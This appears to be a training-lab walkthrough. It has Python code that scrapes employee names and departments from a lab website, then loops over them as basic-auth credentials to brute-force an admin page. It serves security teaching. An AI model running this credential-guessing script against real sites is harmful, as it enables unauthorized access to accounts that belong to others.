Lab7 - Python Assisted Exploitation
Using the provided VPN file, connect to the virtual environment. Then, navigate to
http://172.16.120.120 and browse through the site to identify its functionality.
It is not uncommon to come across an employee’s name being used as a username. It is also
not uncommon to see an employee’s department being used as a password. Corporate sites
usually include these pieces of information.
Collecting such information by hand can be a tedious procedure, so use Python to
scrape it instead, and then create a brute-forcing script that uses the collected
information as credentials. Run the brute-forcing script against the Admin Area.
Download the configuration file and use openvpn to connect to the lab. Once connected,
navigate to 172.16.120.120:
The page contains a table with some employee names and the departments they work in.
Also, at the bottom of the page, you can find a link to the “Admin Area,” which is
protected by basic authentication.
Browsers recognize this type of authentication and display a login prompt when they
encounter it, which is what you see upon browsing to the admin area. This way, the
user does not even need to know that an additional Authorization header is involved,
and can simply log in conveniently.
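Under the hood, basic authentication simply base64-encodes "username:password" and sends the result in the Authorization header with every request. A quick sketch (the credentials here are made-up placeholders):

```python
import base64

# Basic authentication base64-encodes "username:password" and sends it
# in the Authorization header; the browser builds this header for us.
creds = base64.b64encode(b"admin:secret").decode()
header = {"Authorization": "Basic " + creds}
print(header)  # {'Authorization': 'Basic YWRtaW46c2VjcmV0'}
```

The requests library can build this header for us automatically, which we will rely on later.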
In order to use the suggested libraries, specifically requests and BeautifulSoup, you
will need to install them. To install Python libraries, use the Python package manager
“pip”. It comes preinstalled with the latest Kali Linux and is available via the
command line.
To install the aforementioned libraries, issue the following commands in the terminal:
For requests:
pip install requests
For BeautifulSoup:
pip install beautifulsoup4
import requests
from bs4 import BeautifulSoup as bs4
# This imports the BeautifulSoup class, which is part of the bs4 library,
# and lets us refer to it in our code as bs4. So whenever we write
# bs4(...), we are using BeautifulSoup.
It is recommended to divide the program into smaller functions in order to keep
related functionality together.
Let’s start with writing a function that downloads the target page content:
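A minimal version of this function simply fetches the URL with requests and returns the raw HTML (this is the same downloadPage that appears in the full listing further down):

```python
import requests

def downloadPage(url):
    # Fetch the target page and return its raw HTML content
    r = requests.get(url)
    response = r.content
    return response
```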
Next, let’s create a function that processes the web page content and extracts interesting
information.
In this case, we will create two very similar functions in order to extract the names of the
employees and the names of the departments:
def findDepts(response):
    parser = bs4(response, 'html.parser')
    names = parser.find_all('td', id='department')
    output = []
    for name in names:
        output.append(name.text)
    return output
Now, let’s create a function that sends a request to admin.php containing login credentials:
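One possible sketch of such a function; requests builds the basic-auth header itself when given an auth tuple. The function name tryLogin and the exact admin.php URL are assumptions based on the lab description:

```python
import requests

def tryLogin(username, password):
    # admin.php path assumed from the lab description
    url = 'http://172.16.120.120/admin.php'
    # requests builds the "Authorization: Basic ..." header from the tuple
    r = requests.get(url, auth=(username, password))
    # 401 Unauthorized means the credentials were rejected
    return r.status_code != 401
```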
import requests
from bs4 import BeautifulSoup as bs4

def downloadPage(url):
    r = requests.get(url)
    response = r.content
    return response

def findNames(response):
    parser = bs4(response, 'html.parser')
    names = parser.find_all('td', id='name')
    output = []
    for name in names:
        output.append(name.text)
    return output

def findDepts(response):
    parser = bs4(response, 'html.parser')
    names = parser.find_all('td', id='department')
    output = []
    for name in names:
        output.append(name.text)
    return output
page = downloadPage('http://172.16.120.120')
names = findNames(page)
uniqNames = sorted(set(names))
depts = findDepts(page)
uniqDepts = sorted(set(depts))
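With both lists collected, the brute force itself is just a loop over every name/department pair, sending each one as basic-auth credentials. A sketch, assuming the Admin Area lives at /admin.php as the lab suggests (bruteForce is a hypothetical name, and the sample lists stand in for uniqNames and uniqDepts):

```python
import requests
from itertools import product

def bruteForce(url, usernames, passwords):
    # Try every username/password combination against the basic-auth
    # protected page; anything other than 401 suggests a valid pair.
    for user, pwd in product(usernames, passwords):
        r = requests.get(url, auth=(user, pwd))
        if r.status_code != 401:
            return user, pwd
    return None

# The candidate pairs are simply the Cartesian product of the two lists:
pairs = list(product(['alice', 'bob'], ['sales', 'it']))
print(pairs)  # [('alice', 'sales'), ('alice', 'it'), ('bob', 'sales'), ('bob', 'it')]
```

In the lab, you would call bruteForce('http://172.16.120.120/admin.php', uniqNames, uniqDepts) and print whichever pair comes back.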